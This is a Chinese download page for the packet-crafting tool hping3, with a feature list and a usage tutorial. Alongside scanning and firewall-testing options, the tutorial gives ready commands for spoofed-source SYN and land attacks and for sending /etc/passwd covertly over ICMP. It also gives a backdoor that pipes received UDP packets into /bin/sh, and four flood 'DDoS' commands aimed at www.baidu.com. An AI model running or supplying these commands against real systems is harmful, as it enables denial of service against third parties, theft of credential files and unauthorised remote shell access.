hping3下載安裝 最新更新|軟件分類|軟件專題|手機版|論壇轉貼|軟件發(fā)布

您當前所在位置:首頁系統(tǒng)工具系統(tǒng)設置 → hping3 v20051105 安裝版

hping3

v20051105 安裝版

hping3
  • 軟件大小:570KB
  • 軟件語言:中文
  • 軟件類型:國產軟件 / 系統(tǒng)設置
  • 軟件授權:免費軟件
  • 更新時間:2021-08-09 15:41
  • 軟件等級:4星
  • 應用平臺:WinAll
  • 軟件官網(wǎng):

ITMOP本地下載文件大小:570KB

點贊好評0%(0) 差評差評0%(0)

軟件介紹人氣軟件精品推薦相關文章網(wǎng)友評論下載地址

小編為您推薦:hping3命令工具

hping3是一款可以用于幫助用戶使用計算機命令行來生成和解析TCP/IP協(xié)議數(shù)據(jù)包匯編/分析的免費開源工具,支持多種協(xié)議,在各個系統(tǒng)上都可以較為穩(wěn)定的運行,幫助用戶快速的測試網(wǎng)絡安全等等一系列的功能

軟件功能

- 防火墻測試

- 高級端口掃描

- 網(wǎng)絡測試,使用不同的協(xié)議,TOS,分片

- 手動路徑MTU發(fā)現(xiàn)

- 在所有支持的協(xié)議下,高級traceroute

- 遠程操作系統(tǒng)指紋

- 遠程正常運行時間猜測

- TCP/IP協(xié)議棧審計

- hping也可以用于學習TCP/IP的學生

hping3安裝

用法介紹

用法: hping3 host [options]

-h --help 顯示幫助

-v --version 顯示版本

-c --count 發(fā)送數(shù)據(jù)包的數(shù)目

-i --interval 發(fā)送數(shù)據(jù)包間隔的時間 (uX即X微秒, 例如: -i u1000)

--fast 等同 -i u10000 (每秒10個包)

--faster 等同 -i u1000 (每秒100個包)

--flood 盡最快發(fā)送數(shù)據(jù)包,不顯示回復。

-n --numeric 數(shù)字化輸出,象征性輸出主機地址。

-q --quiet 安靜模式

-I --interface 網(wǎng)卡接口 (默認路由接口)

-V --verbose 詳細模式

-D --debug 調試信息

-z --bind 綁定ctrl+z到ttl(默認為目的端口)

-Z --unbind 取消綁定ctrl+z鍵

--beep 對于接收到的每個匹配數(shù)據(jù)包蜂鳴聲提示

hping3安裝

模式亮點

模式選擇

default mode TCP // 默認模式是 TCP

-0 --rawip RAWIP模式,原始IP模式。在此模式下HPING會發(fā)送帶數(shù)據(jù)的IP頭。即裸IP方式。使用RAWSOCKET方式。

-1 --icmp ICMP模式,此模式下HPING會發(fā)送IGMP應答報,你可以用--ICMPTYPE --ICMPCODE選項發(fā)送其他類型/模式的ICMP報文。

-2 --udp UDP 模式,缺省下,HPING會發(fā)送UDP報文到主機的0端口,你可以用--baseport --destport --keep選項指定其模式。

-8 --scan SCAN mode. //掃描模式 指定掃描對應的端口。

Example: hping --scan 1-30,70-90 -S www.target.host // 掃描

-9 --listen listen mode // 監(jiān)聽模式

IP 模式

-a --spoof spoof source address //源地址欺騙。偽造IP攻擊,防火墻就不會記錄你的真實IP了,當然回應的包你也接收不到了。

--rand-dest random destionation address mode. see the man. // 隨機目的地址模式。詳細使用 man 命令

--rand-source random source address mode. see the man. // 隨機源地址模式。詳細使用 man 命令

hping3安裝

功能介紹

防火墻測試

使用Hping3指定各種數(shù)據(jù)包字段,依次對防火墻進行詳細測試。請參考:https://0daysecurity.com/articles/hping3_examples.html

測試防火墻對ICMP包的反應、是否支持traceroute、是否開放某個端口、對防火墻進行拒絕服務攻擊(DoS attack)。例如,以LandAttack方式測試目標防火墻(Land Attack是將發(fā)送源地址設置為與目標地址相同,誘使目標機與自己不停地建立連接)。

hping3 -S -c 1000000 -a 10.10.10.10 -p 21 10.10.10.10

端口掃描

Hping3也可以對目標端口進行掃描。Hping3支持指定TCP各個標志位、長度等信息。以下示例可用于探測目標機的80端口是否開放:

hping3 -I eth0 -S 192.168.10.1 -p 80

其中-I eth0指定使用eth0端口,-S指定TCP包的標志位SYN,-p 80指定探測的目的端口。

hping3支持非常豐富的端口探測方式,nmap擁有的掃描方式hping3幾乎都支持(除開connect方式,因為Hping3僅發(fā)送與接收包,不會維護連接,所以不支持connect方式探測)。而且Hping3能夠對發(fā)送的探測進行更加精細的控制,方便用戶微調探測結果。當然,Hping3的端口掃描性能及綜合處理能力,無法與Nmap相比。一般使用它僅對少量主機的少量端口進行掃描。

Idle掃描

Idle掃描(Idle Scanning)是一種匿名掃描遠程主機的方式,該方式也是有Hping3的作者Salvatore Sanfilippo發(fā)明的,目前Idle掃描在Nmap中也有實現(xiàn)。

該掃描原理是:尋找一臺idle主機(該主機沒有任何的網(wǎng)絡流量,并且IPID是逐個增長的),攻擊端主機先向idle主機發(fā)送探測包,從回復包中獲取其IPID。冒充idle主機的IP地址向遠程主機的端口發(fā)送SYN包(此處假設為SYN包),此時如果遠程主機的目的端口開放,那么會回復SYN/ACK,此時idle主機收到SYN/ACK后回復RST包。然后攻擊端主機再向idle主機發(fā)送探測包,獲取其IPID。那么對比兩次的IPID值,我們就可以判斷遠程主機是否回復了數(shù)據(jù)包,從而間接地推測其端口狀態(tài)。

拒絕服務攻擊

使用Hping3可以很方便構建拒絕服務攻擊。比如對目標機發(fā)起大量SYN連接,偽造源地址為192.168.10.99,并使用1000微秒的間隔發(fā)送各個SYN包。

hping3 -I eth0 -a 192.168.10.99 -S 192.168.10.33 -p 80 -i u1000

其他攻擊如smurf、teardrop、land attack等也很容易構建出來。

文件傳輸

Hping3支持通過TCP/UDP/ICMP等包來進行文件傳輸。相當于借助TCP/UDP/ICMP包建立隱秘隧道通訊。實現(xiàn)方式是開啟監(jiān)聽端口,對檢測到的簽名(簽名為用戶指定的字符串)的內容進行相應的解析。在接收端開啟服務:

hping3 192.168.1.159 --listen signature --safe --icmp

監(jiān)聽ICMP包中的簽名,根據(jù)簽名解析出文件內容。

在發(fā)送端使用簽名打包的ICMP包發(fā)送文件:

hping3 192.168.1.108--icmp -d 100 --sign signature --file /etc/passwd

將/etc/passwd密碼文件通過ICMP包傳給192.168.10.44主機。發(fā)送包大小為100字節(jié)(-d 100),發(fā)送簽名為signature(-sign signature)。

木馬功能

如果Hping3能夠在遠程主機上啟動,那么可以作為木馬程序啟動監(jiān)聽端口,并在建立連接后打開shell通信。與netcat的后門功能類似。

示例:本地打開53號UDP端口(DNS解析服務)監(jiān)聽來自192.168.10.66主機的包含簽名為signature的數(shù)據(jù)包,并將收到的數(shù)據(jù)調用/bin/sh執(zhí)行。

在木馬啟動端:

hping3 192.168.10.66 --listen signature --safe --udp -p 53 | /bin/sh

在遠程控制端:

echo ls >test.cmd

hping3 192.168.10.44 -p53 -d 100 --udp --sign siganature --file ./test.cmd

將包含ls命令的文件加上簽名signature發(fā)送到192.168.10.44主機的53號UDP端口,包數(shù)據(jù)長度為100字節(jié)。

當然這里只是簡單的演示程序,真實的場景,控制端可以利益shell執(zhí)行很多的高級復雜的操作。

hping主要是進行DDOS攻擊的

1、UDP ddos攻擊:

hping3 -c 10000 -d 120 --udp -w 64 -p 80 --flood --rand-source www.baidu.com

2、ICMP  ddos攻擊:

hping3 -c 10000 -d 120 --icmp -w 64 -p 80 --flood --rand-source www.baidu.com

3、SYN ddos攻擊:

hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source www.baidu.com

4、ACK ddos攻擊:

hping3 -c 10000 -d 120 -A -w 64 -p 80 --flood --rand-source www.baidu.com

更多>>軟件截圖

推薦軟件

其他版本下載

    精品推薦

    相關文章

      下載地址

      • hping3 v20051105 安裝版

      查看所有評論>>網(wǎng)友評論

      發(fā)表評論

      (您的評論需要經(jīng)過審核才能顯示) 網(wǎng)友粉絲QQ群號:203046401

      查看所有0條評論>>

      更多>>猜你喜歡